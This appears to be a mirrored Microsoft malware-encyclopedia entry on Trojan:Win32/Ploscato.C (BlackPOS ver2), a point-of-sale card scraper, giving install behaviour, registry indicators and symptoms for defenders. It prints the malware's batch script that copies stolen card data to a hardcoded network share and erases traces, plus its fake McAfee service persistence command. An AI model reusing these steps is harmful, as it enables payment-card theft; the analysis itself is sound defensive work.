Home / malware Trojan:Win32/Ploscato.C
First posted on 03 October 2014.
Source: MicrosoftAliases :
There are no other names known for Trojan:Win32/Ploscato.C.
Explanation :
Threat behavior
Trojan:Win32/Ploscato.C is a trojan that collects point-of-sale (POS) information from the infected machine. The particular variant might have been involved in the Home Depot point of sale breach in 2014, and is also known as €œBlackPOS ver2€Â.
Installation
Trojan:Win32/Ploscato.C is a command line tool. When run it prints the following help message on the POS machine:
- €œUsage: -[start|stop|install|uninstall]€Â
Installation is initiated through the €œ-install€ command line argument. It installs itself as a service by adding the service €œmcfmisvc€ with the display name €œMcAfee Framework Management Instrumentation€Â. This service sets itself to run the command-line tool with the argument €œ-service€ to act as the service component.
After adding this service, it modifies the €œLanmanWorkstation€ service to depend on this newly added service. It does this by running the following command:
- €œ%system32\sc.exe config LanmanWorkstation depend= mcfmisvc€Â
Following these operations you should see the following changed registry keys:
- HKLM\SYSTEM\CurrentControlSet\Services\lanmanworkstation\DependOnService: 'mcfmisvc'
- H KLM\SYSTEM\CurrentControlSet\Services\lanmanworkstation\DependOnGroup: 00
- HKLM\SYSTEM\CurrentControlSet\Services\mcfmisvc\Type: 0x00000010
- HKLM\SYSTEM\CurrentControlSet\Services\mcfmisvc\Start: 0x00000002
- HKLM\SYSTEM\CurrentControlSet\Services\mcfmisvc\ErrorControl: 0x00000001
- HKLM\SYSTEM\CurrentControlSet\Services\mcfmisvc\ImagePath: "
\ .exe -service" - HKLM\SYSTEM\CurrentControlSet\Services\mcfmisvc\DisplayName: "McAfee Framework Management Instrumentation"
- HKLM\SYSTEM\CurrentControlSet\Services\mcfmisvc\ObjectName: "LocalSystem"
- HKLM\SYSTEM\CurrentControlSet\Services\mcfmisvc\Description: "Provides systems management information to and from McAfee Framework Objects"
Payload
Steals credit and bank card data
We have seen this threat's payload named €œFrameworkServiceLog.exe€Â.
The tool takes command-line arguments for the following actions:
- €œ-start€Â: Starts the service.
- €œ-stop€Â: Stops the service.
- €œ-install€Â: Installs the service.
- €œ-uninstall€Â: Deletes the service.
- €œ-service€Â: Entry point for the service.
When run with the €œ-service€ command-line argument as a service, the malware begins.
It periodically loops through examining all the running processing. It scans all processes for credit and bank card information, except the following:
- Chrome.exe
- Conhost.exe
- Csrss.exe
- Ctfmon.exe
- Explorer.exe
- Firefox.exe
- Lsass.exe
- Mdm.exe
- Regsrvc.exe
- Sched.exe
- Services.exe
- Smss.exe
- Spoolsv.exe
- Svchost.exe
- System
- Taskmgr.exe
- Wininit.exe
- Winlogon.exe
- Wmiprvse.exe
For all other processes it builds a memory map of the process and begins scanning the memory contents for memory patterns that match credit card information. If it finds memory that matches this pattern, it then writes the stolen financial data to the file €œMcTrayErrorLogging.dll€Â.
It periodically, drops and runs the following decrypted batch file as €œt.bat€ in the working directory:
- set src=t:\temp\dotnet\NDP45-KB2737084-x86.exe
net use t: \\10.44.2.153\d$/user:10.44.2.153\
if exist %src% (
type McTrayErrorLogging.dll >> t:\temp\dotnet\NDP45-KB2737084-x86.exe
del /F /Q McTrayErrorLogging.dll
)
net use t: /DEL /yes
del /F /Q t.bat
This batch file indicates it is clearly a targeted attack since it has hardcoded local IP addresses and credentials.
The script maps a networked computer share to drive T:\ on the local machine, then runs the file €œt:\temp\dotnet\NDP45-KB2737084-x86.exe€ off this network share, providing the stolen financial data in €œMcTrayErrorLogging.dll€ as input. Finally, it cleans up the stolen financial information from the local machine and unmaps the network drive.
There are also political messages embedded in the binary referencing anti-US sentiment websites.
This malware description was produced using analysis of file SHA1 98dbaeb6d46bd09eca002e1f2b6f3e76fd3222cd.
Additional information.
There is more information about this threat in the following blogs:
- New BlackPOS Malware Emerges in the Wild, Targets Retail Accounts
- Home Depot hit by same malware as target
Analysis by Geoff McDonald
Symptoms
The following could indicate that you have this threat on your PC:
- You see these entries or keys in your registry:
HKLM\SYSTEM\CurrentControlSet\Services\lanmanworkstation\DependOnService: 'mcfmisvc'
HKLM\SYSTEM\CurrentControlSet\Services\lanmanworkstation\DependOnGroup: 00
HKLM\SYSTEM\CurrentControlSet\Services\mcfmisvc\Type: 0x00000010
HKLM\SYSTEM\CurrentControlSet\Services\mcfmisvc\Start: 0x00000002
HKLM\SYSTEM\CurrentControlSet\Services\mcfmisvc\ErrorControl: 0x00000001
HKLM\SYSTEM\CurrentControlSet\Services\mcfmisvc\ImagePath: "\ .exe -service"
HKLM\SYSTEM\CurrentControlSet\Services\mcfmisvc\DisplayName: "McAfee Framework Management Instrumentation"
HKLM\SYSTEM\CurrentControlSet\Services\mcfmisvc\ObjectName: "LocalSystem"
HKLM\SYSTEM\CurrentControlSet\Services\mcfmisvc\Description: "Provides systems management information to and from McAfee Framework Objects"Last update 03 October 2014